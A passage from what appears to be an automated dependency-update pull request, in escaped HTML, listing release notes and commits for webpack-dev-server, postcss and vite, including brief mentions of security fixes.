(2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadded \u003ccode\u003egetClientEntry\u003c/code\u003e and \u003ccode\u003egetClientHotEntry\u003c/code\u003e methods to get clients entries (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/dc642a832d45c23c5c7a08fbf29995e0db7e0d95\"\u003edc642a8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003espeed up initial client bundling (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/145b5d01610a16468fc32719a20366682b0e8572\"\u003e145b5d0\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadded \u003ccode\u003egetClientEntry\u003c/code\u003e and \u003ccode\u003egetClientHotEntry\u003c/code\u003e methods to get clients entries (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/dc642a832d45c23c5c7a08fbf29995e0db7e0d95\"\u003edc642a8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003espeed up initial client bundling (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/145b5d01610a16468fc32719a20366682b0e8572\"\u003e145b5d0\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.0.4...v5.1.0\"\u003e5.1.0\u003c/a\u003e (2024-09-03)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b550a702bd4246d1724513b70de0bfbe6604672f\"\u003e\u003ccode\u003eb550a70\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/9704dc52e3f696ae1446428c25882745e9b65cbb\"\u003e\u003ccode\u003e9704dc5\u003c/code\u003e\u003c/a\u003e chore: upgrade selfsigned to v5 and remove node-forge dependency (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5618\"\u003e#5618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/92bf644784741e8ea5adaa4a1dc26f4d462f223d\"\u003e\u003ccode\u003e92bf644\u003c/code\u003e\u003c/a\u003e chore: bump express to update qs (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5621\"\u003e#5621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/792b2f0bd13a3b93abf701fe3a5cf41ee16722f4\"\u003e\u003ccode\u003e792b2f0\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5606\"\u003e#5606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/6d587cab3e023675de2feedf81bcdfcec7d5b774\"\u003e\u003ccode\u003e6d587ca\u003c/code\u003e\u003c/a\u003e chore(deps): bump the dependencies group across 1 directory with 27 updates (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003e\u003ccode\u003ef91baa8\u003c/code\u003e\u003c/a\u003e fix(overlay): add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e\u003ccode\u003e574026c\u003c/code\u003e\u003c/a\u003e fix: compatibility with event target and universal target and lazy compilation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/c53955de36d793345f203ae0f336bd885dd2efaa\"\u003e\u003ccode\u003ec53955d\u003c/code\u003e\u003c/a\u003e docs: remove unused files\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/efe0aea890ca45528ed4d61926aeb8f0d75b20d3\"\u003e\u003ccode\u003eefe0aea\u003c/code\u003e\u003c/a\u003e test: fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b6bb50c5f172f8ce8fa7e1806d28c9b9bbb30d61\"\u003e\u003ccode\u003eb6bb50c\u003c/code\u003e\u003c/a\u003e chore(deps): update\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v4.15.1...v5.2.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `postcss` from 8.4.31 to 8.5.15\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/postcss/postcss/releases\"\u003epostcss's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.5.15\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed declaration parsing performance (by \u003ca href=\"https://github.com/homanp\"\u003e\u003ccode\u003e@​homanp\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.14\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed custom syntax regression (by \u003ca href=\"https://github.com/43081j\"\u003e\u003ccode\u003e@​43081j\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.13\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003epostcss-scss\u003c/code\u003e commend regression.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed reading any file via user-generated CSS.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003eopts.unsafeMap\u003c/code\u003e to disable checks.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.11\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed nested brackets parsing performance (by \u003ca href=\"https://github.com/offset\"\u003e\u003ccode\u003e@​offset\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed XSS via unescaped \u003ccode\u003e\u0026lt;/style\u0026gt;\u003c/code\u003e in non-bundler cases (by \u003ca href=\"https://github.com/TharVid\"\u003e\u003ccode\u003e@​TharVid\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up source map encoding paring in case of the error.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.8\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eProcessor#version\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.7\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImproved source map annotation cleaning performance (by CodeAnt AI).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.6\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eContainerWithChildren\u003c/code\u003e type discriminating (by \u003ca href=\"https://github.com/Goodwine\"\u003e\u003ccode\u003e@​Goodwine\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.5\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003epackage.json\u003c/code\u003e→\u003ccode\u003eexports\u003c/code\u003e compatibility with some tools (by \u003ca href=\"https://github.com/JounQin\"\u003e\u003ccode\u003e@​JounQin\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed Parcel compatibility issue (by \u003ca href=\"https://github.com/git-sumitchaudhary\"\u003e\u003ccode\u003e@​git-sumitchaudhary\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded more details to \u003ccode\u003eUnknown word\u003c/code\u003e error (by \u003ca href=\"https://github.com/hiepxanh\"\u003e\u003ccode\u003e@​hiepxanh\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eFixed types (by \u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eFixed docs (by \u003ca href=\"https://github.com/catnipan\"\u003e\u003ccode\u003e@​catnipan\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed end position of rules with semicolon (by \u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed backwards compatibility for complex cases (by \u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5 “Duke Alloces”\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/postcss/postcss/blob/main/CHANGELOG.md\"\u003epostcss's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.5.15\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed declaration parsing performance (by \u003ca href=\"https://github.com/homanp\"\u003e\u003ccode\u003e@​homanp\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.14\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed custom syntax regression (by \u003ca href=\"https://github.com/43081j\"\u003e\u003ccode\u003e@​43081j\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.13\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003epostcss-scss\u003c/code\u003e commend regression.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed reading any file via user-generated CSS.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003eopts.unsafeMap\u003c/code\u003e to disable checks.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.11\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed nested brackets parsing performance (by \u003ca href=\"https://github.com/offset\"\u003e\u003ccode\u003e@​offset\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed XSS via unescaped \u003ccode\u003e\u0026lt;/style\u0026gt;\u003c/code\u003e in non-bundler cases (by \u003ca href=\"https://github.com/TharVid\"\u003e\u003ccode\u003e@​TharVid\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up source map encoding paring in case of the error.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.8\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eProcessor#version\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.7\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImproved source map annotation cleaning performance (by CodeAnt AI).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.6\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eContainerWithChildren\u003c/code\u003e type discriminating (by \u003ca href=\"https://github.com/Goodwine\"\u003e\u003ccode\u003e@​Goodwine\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.5\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003epackage.json\u003c/code\u003e→\u003ccode\u003eexports\u003c/code\u003e compatibility with some tools (by \u003ca href=\"https://github.com/JounQin\"\u003e\u003ccode\u003e@​JounQin\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed Parcel compatibility issue (by \u003ca href=\"https://github.com/git-sumitchaudhary\"\u003e\u003ccode\u003e@​git-sumitchaudhary\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.3\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/eae46db765d752cf8f40c4fa2b0b85030079c43d\"\u003e\u003ccode\u003eeae46db\u003c/code\u003e\u003c/a\u003e Release 8.5.15 version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/79508ffa59e42c02056aca61b88bc393c8b516c4\"\u003e\u003ccode\u003e79508ff\u003c/code\u003e\u003c/a\u003e Update CI actions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/b128e2131288a411c6e28071d0929542c49e74eb\"\u003e\u003ccode\u003eb128e21\u003c/code\u003e\u003c/a\u003e Speed up declaration parsing by avoiding creating new array on each token\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/9825dca02c33cf610e2a842be767468b67fbecf9\"\u003e\u003ccode\u003e9825dca\u003c/code\u003e\u003c/a\u003e Fix code format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/55789c865281e2be194fa5b4e41dd046be3a2307\"\u003e\u003ccode\u003e55789c8\u003c/code\u003e\u003c/a\u003e Update dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/84fbbe9009cb3cc3bbb4cc3a9b65d468f4844d95\"\u003e\u003ccode\u003e84fbbe9\u003c/code\u003e\u003c/a\u003e Install older pnpm action for old Node.js\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/9f860bd78ec1dbc4f0ae72d693f03f956baa38cb\"\u003e\u003ccode\u003e9f860bd\u003c/code\u003e\u003c/a\u003e Revert pnpm action for old Node.js\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/08771986d47359545f502e009763e223b66bfcf6\"\u003e\u003ccode\u003e0877198\u003c/code\u003e\u003c/a\u003e Update CI actions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/b2d1a335cea818f8b27e5cfb90147648afe3e582\"\u003e\u003ccode\u003eb2d1a33\u003c/code\u003e\u003c/a\u003e Fix linter warnings\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/0700dac92283bc259977dff2743ca74a00f58267\"\u003e\u003ccode\u003e0700dac\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2088\"\u003e#2088\u003c/a\u003e from rootvector2/add-oss-fuzz-harness\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/postcss/postcss/compare/8.4.31...8.5.15\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `vite` from 4.4.9 to 4.5.14\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitejs/vite/blob/v4.5.14/packages/vite/CHANGELOG.md\"\u003evite's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.14 (2025-04-30)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19965\"\u003e#19965\u003c/a\u003e, check static serve file inside sirv (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19967\"\u003e#19967\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/7739479\"\u003e7739479\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19965\"\u003e#19965\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19967\"\u003e#19967\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: run format (\u003ca href=\"https://github.com/vitejs/vite/commit/99afb60\"\u003e99afb60\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.13 (2025-04-10)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19830\"\u003e#19830\u003c/a\u003e, reject requests with \u003ccode\u003e#\u003c/code\u003e in request-target (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19832\"\u003e#19832\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/41f3819\"\u003e41f3819\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19830\"\u003e#19830\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19832\"\u003e#19832\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.12 (2025-04-03)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19782\"\u003e#19782\u003c/a\u003e, fs check with svg and relative paths (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19785\"\u003e#19785\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/0a3dcf5\"\u003e0a3dcf5\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19782\"\u003e#19782\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19785\"\u003e#19785\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.11 (2025-03-31)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19761\"\u003e#19761\u003c/a\u003e, fs check in transform middleware (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19763\"\u003e#19763\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/26e1764\"\u003e26e1764\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19761\"\u003e#19761\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19763\"\u003e#19763\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.10 (2025-03-24)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19702\"\u003e#19702\u003c/a\u003e, fs raw query with query separators (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19704\"\u003e#19704\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/315695e\"\u003e315695e\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19702\"\u003e#19702\u003c/a\u003e \u003ca 